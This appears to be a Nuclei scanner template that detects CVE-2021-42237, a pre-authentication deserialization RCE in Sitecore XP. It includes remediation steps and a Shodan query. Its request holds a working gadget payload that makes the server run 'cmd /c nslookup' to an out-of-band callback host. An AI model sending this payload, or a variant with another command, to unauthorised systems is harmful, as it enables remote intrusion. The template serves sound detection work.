id: CVE-2021-42237

info:
  name: Sitecore Experience Platform Pre-Auth RCE
  author: pdteam
  severity: critical
  description: Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability.
  reference:
    - https://blog.assetnote.io/2021/11/02/sitecore-rce/
    - https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776
    - https://nvd.nist.gov/vuln/detail/CVE-2021-42237
  remediation: |
    For Sitecore XP 7.5.0 - Sitecore XP 7.5.2, use one of the following solutions:
    - Upgrade your Sitecore XP instance to Sitecore XP 9.0.0 or higher.
    - Consider the necessity of the Executive Insight Dashboard and remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
    - Upgrade your Sitecore XP instance to Sitecore XP 8.0.0 - Sitecore XP 8.2.7 version and apply the solution below.
    - For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2021-42237
    cwe-id: CWE-502
  metadata:
    shodan-query: http.title:"SiteCore"
  tags: rce,sitecore,deserialization,oast

requests:
  - raw:
      - |
        POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        foo 2 <_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0" xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic" xmlns:a="http://schemas.datacontract.org/2004/07/System"> mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 Compare System.String System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]] Start System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 System.Diagnostics.Process System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]] System.Diagnostics.Process Start(System.String, System.String) System.Diagnostics.Process Start(System.String, System.String) 8 Int32 Compare(System.String, System.String) System.Int32 Compare(System.String, System.String) 8 2 /c nslookup {{interactsh-url}} cmd

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms DNS Interaction
        words:
          - "dns"

      - type: word
        part: body
        words:
          - "System.ArgumentNullException"